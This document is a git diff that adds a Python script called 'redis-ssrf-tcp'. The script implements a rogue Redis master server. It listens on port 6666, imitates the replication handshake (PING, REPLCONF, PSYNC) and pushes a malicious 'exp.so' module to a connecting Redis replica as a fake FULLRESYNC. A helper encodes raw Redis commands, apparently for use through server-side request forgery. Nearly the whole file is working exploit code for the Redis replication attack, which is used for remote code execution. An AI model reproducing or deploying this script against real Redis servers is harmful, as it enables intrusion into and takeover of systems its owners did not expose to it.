diff --git a/redis-ssrf-tcp b/redis-ssrf-tcp new file mode 100644 index 0000000..57257f3 --- /dev/null +++ b/redis-ssrf-tcp @@ -0,0 +1,70 @@ +#!/usr/local/bin python +# coding=utf8 +import socket +import time + +CRLF = b"\r\n" +payload = open("exp.so", "rb").read() +exp_filename = "exp.so" + +def redis_format(arr): + global CRLF + redis_arr = arr.split(" ") + cmd = b"*" + str(len(redis_arr)).encode() + for x in redis_arr: + if isinstance(x, str): + x_bytes = x.encode('utf-8') + else: + x_bytes = x + cmd += CRLF + b"$" + str(len(x_bytes)).encode() + CRLF + x_bytes + cmd += CRLF + return cmd + +def redis_connect(rhost, rport): + sock = socket.socket() + sock.connect((rhost, rport)) + return sock + +def send(sock, cmd): + sock.send(redis_format(cmd)) + print(sock.recv(1024).decode("utf-8")) + +def RogueServer(lport): + global CRLF + global payload + flag = True + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.bind(("0.0.0.0", lport)) + sock.listen(10) + clientSock, address = sock.accept() + + print("\033[92m[+]\033[0m Accepted connection from {}:{}".format(address[0], address[1])) + + while flag: + data = clientSock.recv(1024) + if not data: + break + if b"PING" in data: + result = b"+PONG" + CRLF + clientSock.send(result) + flag = True + elif b"REPLCONF" in data: + result = b"+OK" + CRLF + clientSock.send(result) + flag = True + elif b"PSYNC" in data or b"SYNC" in data: + result = b"+FULLRESYNC " + b"a" * 40 + b" 1" + CRLF + result += b"$" + str(len(payload)).encode() + CRLF + result += payload + result += CRLF + clientSock.send(result) + print("\033[92m[+]\033[0m FULLRESYNC ...") + flag = False + + print("\033[92m[+]\033[0m It's done") + clientSock.close() + sock.close() + +if __name__ == "__main__": + lport = 6666 + RogueServer(lport)